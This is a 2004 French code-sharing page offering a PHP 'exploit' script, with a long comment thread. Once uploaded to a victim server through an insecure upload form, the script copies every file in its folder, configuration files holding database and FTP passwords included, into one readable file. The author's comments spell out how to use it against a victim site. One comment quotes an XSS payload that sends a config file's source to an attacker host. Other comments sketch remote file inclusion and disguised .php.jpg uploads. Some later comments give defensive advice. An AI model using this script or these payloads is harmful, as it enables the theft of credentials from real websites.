begin process at 2010 02 10 14:20:52
  Trouver un code source :
 
dans
 
[ Dernières recherches ]
Accueil > 

Code

 > 

Sécurité & Cryptage

 > EXPLOI FAILLE INCLUDE & UPLOAD

EXPLOI FAILLE INCLUDE & UPLOAD


 Information sur la source

Note :
6,56 / 10 - par 25 personnes
6,56 / 10

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10
Catégorie :Sécurité & Cryptage Niveau :Débutant Date de création :18/04/2004 Date de mise à jour :18/04/2004 06:27:30 Vu :15 616
Auteur : ceced

Ecrire un message privé
Commentaire sur cette source (50)
Ajouter un commentaire et/ou une note

 Description

faille include  coté serveur, un clik=le code (lecture des fichiers!)

Source

  • <?
  • $dir=opendir('.');
  • $output="code.own";
  • $fpout = fopen($output, "a");
  • while ($file = readdir($dir))
  • {
  • if ($fpout)
  • {
  • if ((filetype($file) == "dir") || ($file == $output))
  • ;
  • else
  • {
  • $fpin = fopen($file, "r");
  • if ($fpin)
  • {
  • fputs($fpout, "\n".$file."\n");
  • while (!feof($fpin))
  • {
  • $line=fgets($fpin,1024);
  • fputs($fpout,$line);
  • }
  • fclose($fpin);
  • }
  • }
  • }
  • }
  • echo "<a href=$output> Show source :-)</a>";
  • closedir($dir);
  • fclose($fpout);
  • ?>
<?


$dir=opendir('.');
$output="code.own";

$fpout = fopen($output, "a");

while ($file = readdir($dir))
 {
  if ($fpout)
  {
    if ((filetype($file) == "dir") || ($file == $output))
    ;
    else
    {
      $fpin = fopen($file, "r");
      if ($fpin)
      {
        fputs($fpout, "\n".$file."\n");

        while (!feof($fpin))
        {
            $line=fgets($fpin,1024);
            fputs($fpout,$line);
        }
        fclose($fpin);
      }
    }
  }
 }
 echo "<a href=$output> Show source :-)</a>";
 
closedir($dir);
fclose($fpout);

?>

 Conclusion

La securité avant tout!


 Sources du même auteur

RECUPERATION DES IMAGES D'UN DOSSIER EXTERIEUR
REDIMENSIONNER TOUTE VOS IMAGES A LA VOLER A PARTIR D'UN DOS...
VERIFICATION EN TEMP REEL DES ADRESSE MAIL LA VRAI!
GENERER A LA VOLER UN FICHIER XML VIA UNE TABLE SQL + PHP
SCANER VOS PORT ET AFFICHE LES PORT OUVERT + LES NOMS DES TR...
Toutes les sources de ceced

 Sources de la même categorie

ALGORITHME DE CÉSAR SUR LA TABLE ASCII par Nementon
Source avec une capture CODEC D'OBFUSCATION DE LIEN HTML (PHP5) par masternico
GÉRER UN .HTPASSWD par coockiesch
Source avec Zip SERSESSIONS > CLASS PHP5 POUR GERER LES SESSIONS SIMPLEMENT par Astalavista
Source avec Zip PROTECTION CONTRE LES FAILLES CSRF : CROSS SITE REQUEST FORG... par aKheNathOn
Toutes les sources de la catégorie Sécurité & Cryptage

Commentaires et avis

Commentaire de zzzzzz le 18/04/2004 15:51:01

Qui a mit 1/10 ? n'importe quoi c'est pas prk c marqué exploit qu'il faut marquer directement 1/10. moi je te remercie pour ta source et je met 10/10 por compenser, @+

Commentaire de OverDarck le 18/04/2004 19:59:02

Tout simplement exelent, d'une simplicitée certaine, mais d'une puissance extraordinaire !!!!
Merci bien !

Commentaire de ceced le 18/04/2004 22:21:51

merci bien, lol, mais le but qd meme et pour dir la securité avant tout!
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...

Commentaire de zzzzzz le 18/04/2004 23:04:34

Par contre tu pourrai détailler le principe de l'exploit car je n'ai pas comprit le principe (:p) merci.

Commentaire de ceced le 19/04/2004 00:14:30

Le principe est simple, cela marche seulement coté serveur, et comme tous le monde sais, il faut, réussir, a uploader se fichier, pour recuperer les login et passe grace a ce script ...(cela peut etre sql, lhost, ftp, ect..) Donc en gros, si le webmaster n'a pas securisé l'upload de fichier en surveillant les extentions, .php, ou autre, risque et perile pour lui!

Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php

enfait on s'est tous que les pages, config.inc.php ou autre dont la majorité utilise le nom de c page, dedans se trouve les connexions, cad, host, pass, login d'autre par tu sais que tu ne peu pas executé se script comme http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!

J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...

VOILA le but de se script et de lire toute les source extention php dans tous les rep/

de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur

Voir aussi fonction showsource("page") si tu veu t amusé...

Voilou..

Commentaire de koko le 19/04/2004 07:34:08

http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

il y a moyen tout de meme ^^

mais je dirais pas comment

Commentaire de Kirua le 19/04/2004 07:39:43

bah Koko, y a pas moyen si le webmaster prend ses dispositions, voilà tout. C'est comme ça pour tous les points sensibles :-)

Commentaire de koko le 19/04/2004 08:11:48

mais alors l'utilité de cette source si le webmaster prend ses dispositions ?

c'était juste que je disais qu'il y avait comme meme moyen de le faire :)

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 08:34:02

oui mais en général sur chez un hébergeur, on a seulement accès son répertoire et non celui des autres ... le seule moyen d'utiliser ce script reste de trouver un site qui authorise l'upload sauvage ... hihi.
Et ce qui serait intéressant c'est de rechercher la racine du site :
&lt;?
ex :
$dir='.';
while (is_dir($dir))
{
    $dir.='../';
}
?&gt;

Ou un truc dans le genre ...

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 08:38:24

hé koko je viens de réaliser un truc la ...

http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

Là le résultat sera uniquement au mieux du html !!!

Tu ne peux pas avoir la source d'un php distant comme ca !
A moins de configurer tonsite.com comme il faut pour le faire !!!

Et ca c'est plutot utopique, non ?

Commentaire de ceced le 19/04/2004 09:51:44

http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

1. KOKO SI TU ARRIVE TU AS DETRUIT PHP,
2.http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php  a la limite tu peu fair un script java script pour recuperation ou volé les cookies c'est tous! mais pas executé un script coté distant !

Commentaire de Samiby le 19/04/2004 09:54:28

de tout de façon, qui n'a pas le code d'accès au FTP, n'as le droit de lire les fichiers. Il ne peut les lire qu'au travers du navigateur, sous forme de HTML. il me semble que les fichiers sont protégés contre la lecture non autorisée chez tous les hébergeurs.

Commentaire de ceced le 19/04/2004 09:56:12

Mais evidement sinon php serai interdit!

Commentaire de Samiby le 19/04/2004 10:04:47

Maids donc, où est la faille ? Tu ne peux rien obtenir par ce code, si ce n'est ce que tu as en faisant 'afficher la source' dans ton navigateur.

Commentaire de ceced le 19/04/2004 10:10:28

la faille et a l'upload garcon! (include),  peut etre que tu trouvera le fichier, cofing.inc.php, mais tu pouras pas le lire, et si t arrive a uploadé mon fichier, t'obitendra les codes, (si y a pas d'otre faille), mais c'est une faille que bcp utilise surement! croi moi lol c belle et bien une faille!


bin si non dit moi comment tu recupere un code sans une source de cette maniere...

Y A PLusieur faille comme script kiddi, ect... mais celle ci ne fait pas parti d'un script kiddi :) (comme on l appelle)

Commentaire de ceced le 19/04/2004 10:14:54

tu peu obtenire les sources php sachant que php est invisible en affichant la source!

qd tu affiches la source dans un navigateur tu lis que l'html, rien d'autre!

relie la doc php :) (baseeeee)

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 10:48:00

Après ma petite enquête ... tout le monde à raison.
Et donc, koko aussi !!!
Juste que koko a oublié de préciser que le fichier malveillant doit être visualisé par l'admin du site en local !
En plus pour écrire ce script il doit avoir le full patch du fichier dont il veut la source :-P

Voici l'extrait de http://www.phpsecure.info/v2/article/Phpinfo-Security.php :

Si on a le path complet et que le webmaster visite une page contenant ce script :
---------------------------------------------------------------------------
&lt;script&gt;
dafile=window.open('/home/httpd/public_html/config.php');
window.open('http://[attacker]/file.php?'+dafile.document.body.innerText);
&lt;/script&gt;
---------------------------------------------------------------------------
depuis l'ordinateur dans lequel se trouve le site, il renverra la source du fichier config.php au fichier
http://[attacker]/file.php, qui enregistrera l'information d'une façon ou d'une autre.


Voilou ;-)

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 10:52:08

Le full patch que j'écris ... loOl ... mdr ... non excusez-moi ... hihi ... c pas le "full patch" mais le "fullpath".

Commentaire de apxa le 19/04/2004 11:30:08

salut,
c pas une faille mais je dirais plutot un mauvais parametrage de php.ini.
il suffit de mettre php en mode safe et le tour est joue.
sans compté que php.ini permet le refus de certaine commandes dites "sensibles" telque system() ou readfile().
ceci dit comme d'hab la majorité des hacking est souvent du a une mauvaise administration du site, de même pour un developpement.
Have Fun

Commentaire de koko le 19/04/2004 16:31:55

alors je vais expliquer (pas la faille mais bon)

il y a un site qui n'est pas a moi (on va dire phpcs pour que vous compreniez mais il n'y a pas cette faille)

si je fais :
http://www.phpcs.com/include.php?page=http://monsite/script.php

et que dans include.php il y ai : include($_GET['page']);

la page script.php sera exécutée comme du php !!!

MAIS ca ne marchera pas a la base si vous utilisez un serveur apache par exemple.
Car le php est interpreté coté serveur
donc la page sera exécutée sur monsite !!
MAIS BIS il y a moyen que le code soit exécuter sur le serveur phpcs !!!

et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment, je veux pas que des gamins s'amusent avec ca...

Commentaire de Samiby le 19/04/2004 16:42:36

Il y  a déjà eu des imbéciles qui ne surveillent pas l'upload sur leur site ?
Il faut être vraiment débile.
C'est sûr que à partir du moment où tu peux uploader n'importe quel fichier chez quelqu'un, tu peux faire n'importe quoi.

Commentaire de Kirua le 19/04/2004 16:58:47

ce n'est pas une faille, c'est une imprudence. les créateurs de PHP ne sont pas raisonnable de la connerie des gens. qd tu laisses au visiteur la possibilité de placer ses fichiers personnels sur ton serveur FTP, tu prends tes dispositions, basta. je trouve qu'on ne peut pas appeler ça une faille.

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 17:06:48

hihi ... mdr

&gt;et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment ...

J'adore cette phrase !
Hihihi ...
Hé bien moi je te donne un défis alors !
Pour prouver ta bonne fois je t'authorise à me donner le contenu de mon index.php de mon site loOl.

Voici l'adresse : http://ebc.titiplusplus.com/index.php

Aller sans rancune ;-)

Commentaire de koko le 19/04/2004 17:19:50

faut une faille de type include !
et j'ai pas envie de chercher des failles include sur php nuke...

Commentaire de -=|[titiplusplus]|=- le 19/04/2004 17:22:34

En tout cas mon truc plus haut marche !

C'est du XSS ( Cross Site Scripting pour ceux qui ne connaissent pas).

Le plus dur est de faire doublecliquer l'admin dessus ... hehe ...

@+

Commentaire de Samiby le 19/04/2004 17:28:58

Ca marche, mais il faut avoir vu le phpinfo() du site, ce qui n'est pas donné à tout le monde

Commentaire de testetrtr le 23/04/2004 18:21:31

deoler les gas mes cette source n'est pas vraimment ce que je vais califier  de exelent .
pour ma note sa cera 3 a 4  sur 10.

pour quoi parceque  c'est facile de dree une source plus complette que celle la qui donne l'oportuniter d'uploader sur le serveur que vous avec penetrer . et aussi d'executer des commandes shell et des php.

ce pandant c'est un script qui est lier au pirage , c'est pour ca que je vais vous metre qu'une capture d'ecrant de mon script.

( je l'ai tester sur mon serveur,).

http://lux0r.projektas.lt/do_upload.php

Commentaire de psyjc le 27/04/2004 16:25:49

daccord avec testetrtr, la source est bof bof!
mais ton script d'upload aussi ;)
tu devrais revoir la securité de ton upload...

Commentaire de testetrtr le 27/04/2004 18:25:50

desolais mais le script  d'upload n'est pas de moi.

je l'utilise juste pour dennee des exemple comme ici , c'est tous.

si nan explique ton idee de securite de se script.

c'est tj interessant a savoire.

Commentaire de psyjc le 27/04/2004 18:33:08

bah va voir sur ton site :)
dans les derniers uploads : testX.php.jpg
execution de code js au travers dimages (sur IE)
tu devrais verifier le type mime en plus de l'extension de fichier avant d'accepter l'upload d'une image.

Commentaire de testetrtr le 27/04/2004 18:41:14

ok j'ai trouver le prob de la securiter de ce script.
je vais le dire a son proprio.
pour qu'il corrige son script.

pour psyjc  (y a quoi comme astuce pour tester la securiter d'un code php , )? astuce comme celle que t'a tester sur ce script.

tu peux me repondre par mail si tu veux.

Commentaire de apxa le 28/04/2004 10:36:27

Re salut,
je vais peut etre me repeter mais je pense que si tu veux palier ce genre de faille ,il y a plusieurs solutions :
- soit tu passes par un htaccess avec des controles sur l'host appelant le fichier. (apach only)
- soit tu met php en mode safe on avec des refus d'execution de commandes sensibles (apache ou iis)
- soit tu parses via php le path du fichier afin de recuperer l'host et ainsi comparer avec l'host du serveur pour s'assurer que le fichier executer se trouve bien sur le serveur et non un serveur distant.
- soit tu fais ton site en html et tu fais pas chié le monde avec des failles de newbee  (amicalement) ;)
Have Fun.

Commentaire de pgpp le 16/05/2004 23:17:47

salut!
Juste pour dire que je suis d'accord avec koko, il existe une solution plus que simple pour faire exécuter du php via une faille include.
Alors protégez vous bien comme le dit apxa !

Commentaire de coeur_enf le 06/06/2004 19:03:06

tu va t'atker a des noob, ki essai d'aprendre le php, et ki on pe de finance

moi je te le dis, atk toi a un mome de 5 an dans la rue, c'est la meme chose !!!!

je rigole kan je vois des bouffon come ca !!!!

je pense ke si vou aviez + de cervel, vou ferriez une explication pour ke les noob sache ce proteger !!!

la je dirai bravo !

Commentaire de Kirua le 06/06/2004 19:05:51

ça fait 24h que t'es inscrit sur le site et t'es déjà agressif, éh béh...

ceci dit, suis assez d'accord avec toi sur le fait que ce code porte bien mal ce nom, mais vraiment pas d'accord avec le fait que tu prennes à parti toute la click qui a commenté ici en ayant manifestement pas lu les commentaires.

Commentaire de psyjc le 06/06/2004 19:13:59

il y a une (petite) charte juste là, qui dit je cite : "Merci également de veiller à ne pas trop écorcher la langue de molière en écrivant en abrégé (comme sur des SMS)."

alors commence par lire ca, et puis tant que t'y est, tu peux aussi lire les commentaires au dessus avant de dire de la merde...

Commentaire de ceced le 06/06/2004 20:07:35

coeur_enf j'ai envie de te dire juste vie ta vie, et bosse pour ta geule!
no comment!

Commentaire de -=|[titiplusplus]|=- le 10/06/2004 12:49:41

loOl ... et apres ?

Pour moi ca incite en rien du tout ce code, mdr.

Tu voulais nous faire partager ta découverte du whois ?

hihihi

Commentaire de psyjc le 10/06/2004 13:49:25

Mdrrr!
en attendant tu n'a pas du lire ce que j'ai ecrit plus haut..

bref. j'arrette de perdre du temps sur ce fil..

Commentaire de Kirua le 10/06/2004 14:44:22

extrait du texte de présentation de ce code (que tu n'as pas lu):

Explication finale :
---------------------------------------
La securité avant tout!

alors quoi?

Commentaire de skotmarud le 19/06/2004 03:25:25

.txt :X

Commentaire de stal le 30/08/2004 18:27:44

tu n'as pas un lien de telechargement ?

Commentaire de renaud288 le 29/11/2004 16:55:45

Petit commentaire rapide. La faille est connue depuis longtemps.... c'est pas une faille PHP...
T'aurais pu être simpa avec les internautes en donnant des données pour résoudre le pb:
1- le problème est à l'upload de fichier via HTML (postage de fichier).
2- Sécuriser la récupération: test de l'extention... (selon le type de serveur (n'oubliez pas les extentions asp etc si votre serveur interprète plusieurs langauges...)
3- parsage du fichier uploadé: contient il du code php, asp etc...
4- ne pas oublier d'ajouter la fonction addslashes a vos données post ou get (il est possible du mettre du code PHP dedans... avec les b ons guillements, les OR et les fonctions php.
5- ne pas déplacer le fichier du rep tmp avant d'être sur
6- effacer le fichier du dossier tmp
7- si votre hébergeur le permet: ne pas mettre le fichier tmp ou équivalent dans la racine... (si les codes du hacker sont bien faits, il peut exécuter le fichier avant qu'il ne soit supprimé de disque
8- Penser aussi à parser d'autres extentions... attention virus, programme de prise de contrôle sur le serveur etc...
Bonne prog à tous et merci aux programmeurs qui mettent en évidence les failles (ou du moins les expliquent aux débutants)

Commentaire de kankrelune le 06/01/2005 11:24:31

hé coeur_enf(flammé ça doit etre pour ça... :oD)... .. .

Tu fais comment pour combler une faille de sécurité si t'en entend pas parler... anaha ??? .. . :oP

Et en attendant si tu sais lire la moitié des posteurs on parlés de failles de sécu exploitable sans en donner la façon de l'exploiter... .. .

Et faire un whois de phpcs... mais ça t'avance à quoi...  t'a quel age... .. ?

O_o

Il n'y a rien d'illégale dans cette page... va sur les sites de microsoft, de phpnuke, etc... les failles y sont déclarées publiquement dès qu'elles sont trouvées... et heureusement... ça permet de prendre les mesures adéquates pour les combler... .. .

Allez avoue coeur_enf ça t'ennerve parce que tu as peut etre la faille et que personne ici ne donne de code tout fait pour la combler... Alors arrete de pousser mémé dans les orties... .. . ;o)

Pour le reste je serais interessé si quelqu'un à un lien interessant à me conseiller sur la sécurisation du php et sur les points 2, 3 et 4 que vient d'évoquer renaud288... de préference en français si c'est pô trop demander... bien que le site auquel je pense ne présente guere de faille de se genre (le visiteur peut juste lire... pas d'upload, pas de forum et pas encore de guestbook... peut toujours s'accrocher... :oD) ça pourra m'être quand même utile et etre utile à du monde... .. .

^_^

@ tchaOo°

Commentaire de alex1025 le 12/02/2006 13:57:03

si on met un htacces dans le rep ou arrive l image il n'y a plus de soucis non?

Commentaire de guismo1er le 28/03/2006 18:24:06

Vraiment pas mal cette source, ce serait gentil de nous donner des astuces pour protéger des fichiers lors de l'upload, car ca m'interessrerai bcp :)

Merci à vous :)

Commentaire de guismo1er le 07/04/2006 17:15:37

avez vous des idées?

Commentaire de NKWolf le 04/06/2006 13:11:40

bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)

Commentaire de NKWolf le 04/06/2006 13:11:52

bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)

Commentaire de Steph448 le 08/08/2009 06:08:59

xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?

 Ajouter un commentaire

Nos sponsors


Sondage...

Comparez les prix


Console Microsoft Xbox 360 Elite
Entre 299€ et 300€

Visiter le guide achat

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode
 
Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,718 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales
Outils Convertisseur VB/C# Snippets et scripts Outils en ligne La ToolBox
Communauté Programmation Photographie Technologie Newsgroups Emploi Forum Blogs
Guide d'achat Téléphonie mobile Image et son Informatique Bureautique Jeux vidéo
Logiciels Internet & Réseau Développement Market Android Jeux & Loisirs Graphisme Multimédia Sécurité Pilotes
Loisirs Cartes virtuelles Vidéos droles Jeux en ligne Géoguide AndroLib (Android Market)